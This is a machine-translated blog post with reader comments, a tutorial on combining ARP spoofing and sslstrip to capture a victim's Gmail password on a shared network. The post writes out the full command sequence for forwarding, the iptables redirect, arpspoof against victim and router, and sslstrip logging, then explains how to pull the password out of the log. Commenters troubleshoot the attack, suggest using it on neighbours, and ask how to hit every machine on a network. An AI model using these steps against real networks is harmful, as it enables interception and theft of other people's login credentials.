Привіт блогери.
На сьогоднішній день у мене є невелика вибірка того, наскільки небезпечним може бути підключення до будь-якої незахищеної мережі тих, що подобається багатьом з нас.
Сьогодні я збираюся використовувати ArpSpoofing разом із Sslstrip, щоб отримати пароль Gmail. Щоб зробити середовище більш контрольованим, я створив обліковий запис під назвою "testarp@gmail.com".
А оскільки преамбули мені не дуже подобаються, приступимо до справи.
НАВКОЛИШНЄ СЕРЕДОВИЩЕ
Для цього тесту ми маємо наступне:
1. Зловмисник: Це мій настільний або настільний комп’ютер, який має Debian Wheezy. З репозиторіїв ви можете встановити sslstrip y dsniff дістати мати арфування
2. Жертва: Жертва - це планшет Android, який хоче бачити свою електронну пошту лише через браузер.
3. Засіб: Середина - моя Маршрутизатор Cisco DPC2425
АДРЕСИ.
Адреса зловмисника: 172.26.0.2
Адреса маршрутизатора: 172.26.0.1
Адреса жертви: 172.26.0.8
АТАКА:
Перше, що ми зробимо для цієї атаки, це активуємо пересилання, щоб наш комп’ютер міг пересилати інформацію жертві, не усвідомлюючи цього. (Інакше це була б атака на відмову в послугах)
Для цього ми будемо використовувати:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Ahora si hacemos tail -f desdelinux vemos la informacion en vivo y en directo
То як же тоді отримати те, що ми хочемо?
Давайте спочатку введемо нашу пошту на планшеті. Під час входу в систему ми бачимо, що на нашій консолі з’являються тисячі і тисячі речей.
Ahora que ha terminado vamos a abrir nuestro archivo “desdelinux” con nano
nano desdelinux
за допомогою Control + W ми шукаємо щось, що називається SECURE POST.
І ми побачимо щось подібне.
Серед того величезного рядка, якого неможливо побачити, є електронна пошта та пароль жертви.
Тож ми біжимо праворуч, поки нарешті не побачимо світло в кінці тунелю.
В іншому випадку ми побачимо, як ми можемо трохи захиститися від цих атак.
привіт
Користуючись нагодою, можу сказати, що коли публікація була опублікована, команди були неправильними.
У команді iptables в кінці відсутній 8080, який залишився в іншому рядку. І тоді команди arpspoof були в одному рядку. Кожна команда знаходиться в іншому рядку.
Сподіваємось, редактор це бачить і може це виправити.
Привіт.
Я зробив виправлення, про які ви згадали, це нормально?
Якщо ви збираєтесь вставити код у бажаний запис, скористайтеся поданням HTML та переконайтеся, що стаття правильна, перш ніж надсилати її на розгляд. Дякую.
Холодно знати, що ті з нас, хто не має знань, такі вразливі. Дуже хороша інформація, навіть коли я мало розумію тему, я усвідомлюю її важливість. Дякую!
привіт
Але це працює лише в тому випадку, якщо зловмисник і жертва знаходяться в одній мережі. У будь-якому випадку мені здається, що якщо (перебуваючи в одній мережі) ви підключаєтесь за допомогою HTTPS, цього не відбувається, оскільки дані зашифровані ДО того, як вийти з машини. Якщо ви підключаєтеся за допомогою HTTP (без S), я думаю, що навіть дивлячись на мережевий кабель, ви бачите ключі.
Це неправда. Я зламаю пароль Gmail, і якщо ви помітите, що Gmail використовує https. Так? Справа в тому, що, хоча https безпечний, він залежить від http. Тож це не так безпечно.
Не зізнавайтеся стільки про https, що S не для Супермена, а для "безпечного"
він працює з https або без нього, я спробував це з більш спеціалізованим дистрибутивом Linux, і він працює без проблем
Ви можете точно використовувати його, щоб викласти урок тим, хто викрав ваш Wi-Fi. 😀
Це більш-менш схоже на те, що вони давно сказали в блозі Чеми Алонсо:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Остія, чудово, що це робить! / І тоді вони говорять моєму параноїку щоразу, коли я використовую VPN, коли вони йдуть перевіряти банківський рахунок…). До речі, ви повинні побачити, наскільки цинічні люди в коментарях ... якщо врешті це крадуть ...
Тепер нам потрібно взяти підручник про те, як створити та запропонувати власну послугу VPN.
Історія, на яку ви посилаєтесь, дуже цікава, вона навіть здається гідною нової книги, і це змушує мене згадати, коли я користувався Інтернетом своїх сусідів, і хоча я кажу, що знаю цю тему, я думаю, що ніколи не зміг би побачити справжні розміри небезпека, яку я міг би тривати, на щастя для мене, вони лише змінили пароль на WPA2, і ось тут почалася моя історія з провайдером ха-ха
Ось чому в назві написано Sslstrip в дії.
Це працює, поки зловмисник знаходиться посередині
Якою хвилею ви працюєте біля призми? -.-
немає.
Що ви чекаєте, щоб надіслати ваш запит XD
що стосується
хороший пост
Цікаво, пізніше я проведу навчальний тест ... Можливо, я навіть міг би видалити пароль до Wi-Fi і трохи розважитися 😛
Будь-яким випадком, чи можете ви зробити щось подібне, щоб надіслати різні сторінки на ті, що запитував ціль? Наприклад, вони хочуть відкрити Facebook, а я їх перенаправляю в Google? 😛
Так. Але це все зовсім інший рулон.
Можливо, я опублікую це пізніше.
дуже хороший пост, ці теми дуже освітні, тепер нам потрібно мати можливість протистояти цій атаці, оскільки деякі (як я) підключаються до загальнодоступних мереж (наприклад, університету), було б корисно цього уникнути.
Привіт!
У мене це не спрацювало 🙁
Мене тут щось не вдає, крім того, що https-з'єднання шифруються через сертифікат сервера (як тільки сертифікат на вашій машині, ваш браузер відповідає за шифрування) за допомогою iptables ви перенаправляєте порт 80 (http), а не 443 що є https
Я теж це думав. Справа в тому, що хоча https і є "безпечним", на жаль, це залежить від http. Отже, sslstrip цим користується, що змушує браузер вважати, що він використовує дані https, але це не так.
святе лайно! але браузер повинен побачити попередження типу "цей сертифікат походить із підозрілого сайту або чогось подібного" ... Мені неодмінно доведеться зробити тести XD
Ні, абсолютно нічого не виходить.
Нарешті це спрацювало у мене
Я підключений до мережі WEP за допомогою пароля, і він все одно показав мені пароль безпосередньо.
Запит. Чи можете ви зробити цю саму процедуру, але для всіх комп'ютерів, які підключені до мережі, замість того, щоб мати одну жертву?
Так, ти можеш. Але я не робив експериментів. Спробуйте самі і розкажіть нам, як у вас справи.
Єдине, що я отримую від цього, це те, що машина жертви переходить в автономний режим, але sslstrip мені нічого не показує: /
Вам потрібно на мить відключити брандмауер. Або принаймні увімкнути вхідні з'єднання.
Ми з Probe могли бачити лише ім'я користувача та пароль сторінки facebook, у gmail я не знайшов жодного результату в журналі, також мені знадобився лише рядок arpspoof «arpspoof -i -t«. З іншого боку, машина-жертва не могла відкрити деякі сторінки. Я продовжуватиму розслідування, це дуже цікаво. Допомога тим, хто використовує Manjaro, пакети для встановлення: dsniff (тут arpspoff), twisted та python2-pyopenssl. Sslstrip можна завантажити звідси: http://www.thoughtcrime.org/software/sslstrip/
Для його запуску $ python2 sslstrip.py
Привіт.
Це не вийшло, але рядок arpspoof: #arpspoof -i int -t ip-жертва ip-маршрутизатор
Дивись, я роблю саме те, що ти кажеш:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080
arppoof -i eth0 -t 172.26.0.8 172.26.0.1
arppoof -i eth0 -t 172.26.0.1 172.26.0.2
Проблема полягає в тому, що жертва, яка є ще одним комп’ютером, який я маю тут, у своїй кімнаті, залишається без підключення до того моменту, що я повинен перезапустити маршрутизатор, що я можу зробити, допоможіть мені.
Інша справа, я працюю з віртуальною машиною, і коли я виконую команду iwconfig, wlan0 не з'являється, а також коли я виконую ifconfig, однак, якщо у мене на віртуальній машині є Інтернет, що з інтерфейсом eth0.